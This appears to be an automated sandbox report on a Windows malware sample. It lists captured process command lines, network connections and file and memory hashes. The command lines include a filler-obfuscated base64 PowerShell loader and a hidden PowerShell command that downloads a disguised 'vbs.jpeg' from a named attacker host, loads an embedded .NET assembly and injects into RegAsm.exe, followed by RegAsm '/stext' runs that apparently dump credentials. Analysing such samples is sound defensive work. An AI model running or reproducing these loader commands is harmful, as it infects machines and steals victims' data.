⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀YQBn㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀V㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀FM㆛ ⺞ ⏬ ⦦ ⼀dQBi㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀By㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBn㆛ ⺞ ⏬ ⦦ ⼀Cg㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bz㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀YQBy㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀Cw㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀YQBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Ng㆛ ⺞ ⏬ ⦦ ⼀0㆛ ⺞ ⏬ ⦦ ⼀Ew㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀Gc㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bo㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀YwBv㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀bQBh㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BC㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀WwBT㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀cwB0㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀EM㆛ ⺞ ⏬ ⦦ ⼀bwBu㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀ZQBy㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀XQ㆛ ⺞ ⏬ ⦦ ⼀6㆛ ⺞ ⏬ ⦦ ⼀Do㆛ ⺞ ⏬ ⦦ ⼀RgBy㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bQBC㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀cwBl㆛ ⺞ ⏬ ⦦ ⼀DY㆛ ⺞ ⏬ ⦦ ⼀N㆛ ⺞ ⏬ ⦦ ⼀BT㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀cgBp㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Zw㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀YgBh㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀ZQ㆛ ⺞ ⏬ ⦦ ⼀2㆛ ⺞ ⏬ ⦦ ⼀DQ㆛ ⺞ ⏬ ⦦ ⼀QwBv㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀bQBh㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀bwBh㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQBk㆛ ⺞ ⏬ ⦦ ⼀EE㆛ ⺞ ⏬ ⦦ ⼀cwBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bQBi㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀eQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀D0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀Bb㆛ ⺞ ⏬ ⦦ ⼀FM㆛ ⺞ ⏬ ⦦ ⼀eQBz㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀ZQBt㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀UgBl㆛ ⺞ ⏬ ⦦ ⼀GY㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bg㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀EE㆛ ⺞ ⏬ ⦦ ⼀cwBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bQBi㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀eQBd㆛ ⺞ ⏬ ⦦ ⼀Do㆛ ⺞ ⏬ ⦦ ⼀OgBM㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀Cg㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bj㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bQBt㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀bgBk㆛ ⺞ ⏬ ⦦ ⼀EI㆛ ⺞ ⏬ ⦦ ⼀eQB0㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀eQBw㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bs㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BB㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀cwBl㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀YgBs㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀LgBH㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BU㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀c㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Cg㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀LgBJ㆛ ⺞ ⏬ ⦦ ⼀E8㆛ ⺞ ⏬ ⦦ ⼀LgBI㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bQBl㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀KQ㆛ ⺞ ⏬ ⦦ ⼀7㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bt㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bo㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀D0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀eQBw㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀LgBH㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BN㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bo㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀VgBB㆛ ⺞ ⏬ ⦦ ⼀Ek㆛ ⺞ ⏬ ⦦ ⼀Jw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀bwBr㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀K㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀dQBs㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀L㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Fs㆛ ⺞ ⏬ ⦦ ⼀bwBi㆛ ⺞ ⏬ ⦦ ⼀Go㆛ ⺞ ⏬ ⦦ ⼀ZQBj㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀WwBd㆛ ⺞ ⏬ ⦦ ⼀F0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀B4㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀LgBN㆛ ⺞ ⏬ ⦦ ⼀Es㆛ ⺞ ⏬ ⦦ ⼀TgBT㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀M㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀y㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀Nw㆛ ⺞ ⏬ ⦦ ⼀0㆛ ⺞ ⏬ ⦦ ⼀DE㆛ ⺞ ⏬ ⦦ ⼀Lg㆛ ⺞ ⏬ ⦦ ⼀5㆛ ⺞ ⏬ ⦦ ⼀D㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀MQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀DM㆛ ⺞ ⏬ ⦦ ⼀Lg㆛ ⺞ ⏬ ⦦ ⼀y㆛ ⺞ ⏬ ⦦ ⼀Dk㆛ ⺞ ⏬ ⦦ ⼀MQ㆛ ⺞ ⏬ ⦦ ⼀v㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀OgBw㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bo㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀s㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cwBh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀aQB2㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀s㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cwBh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀aQB2㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀s㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cwBh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀aQB2㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀L㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀FI㆛ ⺞ ⏬ ⦦ ⼀ZQBn㆛ ⺞ ⏬ ⦦ ⼀EE㆛ ⺞ ⏬ ⦦ ⼀cwBt㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀L㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQBz㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀Jw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀B9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀fQ㆛ ⺞ ⏬ ⦦ ⼀=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('㆛ ⺞ ⏬ ⦦ ⼀','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MKNS/02/741.901.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zwogkiwmdapiaocrcpyqtwcwpd"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\jqtzlbhnrihvduqvlakjwjwnqkkjc"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mszrmtshfqzaninzulflhorvzqbsvlzh"

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 192.3.109.147:80 192.3.109.147 tcp
US 8.8.8.8:53 147.109.3.192.in-addr.arpa udp
US 8.8.8.8:53 servidorwindows.ddns.com.br udp
BR 191.55.76.236:80 servidorwindows.ddns.com.br tcp
US 8.8.8.8:53 236.76.55.191.in-addr.arpa udp
US 192.3.109.147:80 192.3.109.147 tcp
US 8.8.8.8:53 serversw.duckdns.org udp
US 135.148.195.248:6875 serversw.duckdns.org tcp
US 135.148.195.248:6875 serversw.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 248.195.148.135.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 35.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp

Files

memory/4284-0-0x000000007162E000-0x000000007162F000-memory.dmp

memory/4284-1-0x0000000004D70000-0x0000000004DA6000-memory.dmp

memory/4284-2-0x0000000071620000-0x0000000071DD0000-memory.dmp

memory/4284-3-0x0000000005520000-0x0000000005B48000-memory.dmp

memory/4284-4-0x0000000005390000-0x00000000053B2000-memory.dmp

memory/4284-5-0x0000000005430000-0x0000000005496000-memory.dmp

memory/4284-6-0x00000000054A0000-0x0000000005506000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfavyy3o.r34.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4284-16-0x0000000005D10000-0x0000000006064000-memory.dmp

memory/4284-17-0x0000000006310000-0x000000000632E000-memory.dmp

memory/4284-18-0x0000000006360000-0x00000000063AC000-memory.dmp

memory/4284-20-0x000000006DEE0000-0x000000006DF2C000-memory.dmp

memory/4284-21-0x000000006E080000-0x000000006E3D4000-memory.dmp

memory/4284-19-0x0000000007310000-0x0000000007342000-memory.dmp

memory/4284-31-0x0000000006920000-0x000000000693E000-memory.dmp

memory/4284-32-0x0000000071620000-0x0000000071DD0000-memory.dmp

memory/4284-33-0x00000000075F0000-0x0000000007693000-memory.dmp

memory/4284-34-0x0000000071620000-0x0000000071DD0000-memory.dmp

memory/4284-35-0x0000000071620000-0x0000000071DD0000-memory.dmp

memory/4284-36-0x0000000007D20000-0x000000000839A000-memory.dmp

memory/4284-37-0x00000000076A0000-0x00000000076BA000-memory.dmp

memory/4284-38-0x0000000007700000-0x000000000770A000-memory.dmp

memory/4284-39-0x0000000007920000-0x00000000079B6000-memory.dmp

memory/4284-40-0x0000000007880000-0x0000000007891000-memory.dmp

memory/4284-41-0x00000000078B0000-0x00000000078BE000-memory.dmp

memory/4284-42-0x00000000078C0000-0x00000000078D4000-memory.dmp

memory/4284-43-0x0000000007900000-0x000000000791A000-memory.dmp

memory/4284-44-0x00000000078F0000-0x00000000078F8000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\1gtdujx5\1gtdujx5.cmdline

MD5 d311574d03b4993f3aa304bf67f96925
SHA1 0b7e49c32256f080a00f24e2d52d51bd3429c755
SHA256 8abe2889091a1281271e0f0cdbd195ba6022a1968378bb94426297204ca5231e
SHA512 ac85d204e35d976ada09768dd8eb15504acdcece6b5dc29e278ee9a391baab6928b6b1293a001f8013d05951479179ad5b6767db5f8b27205d66ad2ee53bca9f

\??\c:\Users\Admin\AppData\Local\Temp\1gtdujx5\1gtdujx5.0.cs

MD5 4e9de40112f74a35c04e70ff765bd2d9
SHA1 e1b87ff8213b319bd6dc8a34c6753a0891b080c3
SHA256 1f50f29e22249d0a44023ab9bf900cfb9749cb222541f6fe7b81a9eebc971dfc
SHA512 bf910e45a2fa3fc6790dd7a3b930fd2b24964af2e3cbd049df1da73ad271967731c7b8a8f29d89d542071a80e0388c0e12130b24d606a55da955f838effa931e

\??\c:\Users\Admin\AppData\Local\Temp\1gtdujx5\CSC753D5C0F1284F02B1C3A2396961AB97.TMP

MD5 5924f990e71212f415e3e338178170bc
SHA1 a8f929db905e7485007a0b4b5ddd9be2e79e9fc0
SHA256 0b24bb8764b1e2e124a9f5516e8d3c3636637630e385d1015ab19f5471722cbc
SHA512 82f2e5644e54c1de15b0067d1c33ba13c488cb3745c7d1631d34ab8cc13ea74f3d5fd4592ba9af44853b71889116ad5c4c2c478d9358ef6859ead85275025132

C:\Users\Admin\AppData\Local\Temp\RESD254.tmp

MD5 22b4ec34e2980d63c25653b1e40ac744
SHA1 542ebfffb86efe581bc6887c51e06eed1f2a58c5
SHA256 d4332a4049a41dd4049e61450096e5d30dbbf35763625766eca8fa2c64896706
SHA512 e7f9b662bc5682e257d7e2765177ac5729cee6560f1a29cb123f3863279ad0f66c511b33e5c28591d0415cbcbd48f6793fbda9bf271aec58bb0e8e5292d88f45

C:\Users\Admin\AppData\Local\Temp\1gtdujx5\1gtdujx5.dll

MD5 1a35ca085bc3e8776a10ab629fbfea4f
SHA1 1ae0f49eeee4c3d571c1ba9464ec9d7c914a9f83
SHA256 e11fe36cd48c3d56ea6705f9815f81601f65beee880b0ed8bf8e512baaef5aa7
SHA512 3ff04c6ca3c31776126febba715b6d040b3fd378a62e41ae62217fb67622f1af18548acf4e3c74f935a737961d382951c2067a848ae7e4dff684bef4d73628a0

memory/4284-57-0x00000000078F0000-0x00000000078F8000-memory.dmp

memory/4284-63-0x0000000007BB0000-0x0000000007BD2000-memory.dmp

memory/4284-64-0x0000000008950000-0x0000000008EF4000-memory.dmp

C:\Users\Admin\AppData\Roaming\seatforagirlfriendwhokissflowerwa.vBS

MD5 bbb5526e4329ba09ff5e50938cacf20f
SHA1 3ad1ef94e2ffbe311f3d9017c2f3781d00869951
SHA256 700af46841a34b035ee7431fd07fe6bbd13651c58a704aed14df47cd74ce76ac
SHA512 5919fa788df8b2398078be672ea05a97fa273a4a0dceb8f96d5ba53b336567aeb7132a11ce99ecac7d763c1cb8ddfd2fefaf9607d74885b5927bcaf5de4b4d14

memory/4284-70-0x0000000071620000-0x0000000071DD0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 9faf6f9cd1992cdebfd8e34b48ea9330
SHA1 ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e
SHA256 0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953
SHA512 05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

memory/220-81-0x0000000005E80000-0x00000000061D4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 79904f66bb3ba5a30074e63af6097f48
SHA1 daadf5af84da8f2adcb90cf90aa37186ccaa7a7e
SHA256 11b5f0a0da972d12315464c0d34b0f0d913e50f66fe43e01cf8859c42b05352a
SHA512 a8e256d3765edcf99c957cb31693476fb1e3b8858d8320a069840980cfe37554ce92a2fc5b31a07e1acb987e051046ead40dc1f0a3dadcdead1721c092802c5a

memory/2720-92-0x0000000007A00000-0x0000000007B22000-memory.dmp

memory/2720-93-0x0000000007BC0000-0x0000000007C5C000-memory.dmp

memory/1648-94-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1648-102-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1648-99-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1648-98-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1648-96-0x0000000000400000-0x0000000000482000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 05e68ca79bb3b6107e86a167d016a4b4
SHA1 01fb37018ad509986e1d53d8482d02b4fdf69bac
SHA256 ce68d33dc71e1f9356ca12e229f848a931b66d775d01699e441523f4af4bd735
SHA512 f31dffd70904dca37ce0a68d196b60c094b1af8355910b37557b6586a46975b37bf4a530b16f750989f48413bc86d02e00b2f14210193d23e90f9a492978ff7f

memory/1648-105-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1648-106-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1648-107-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1648-108-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1648-109-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1648-111-0x0000000000400000-0x0000000000482000-memory.dmp

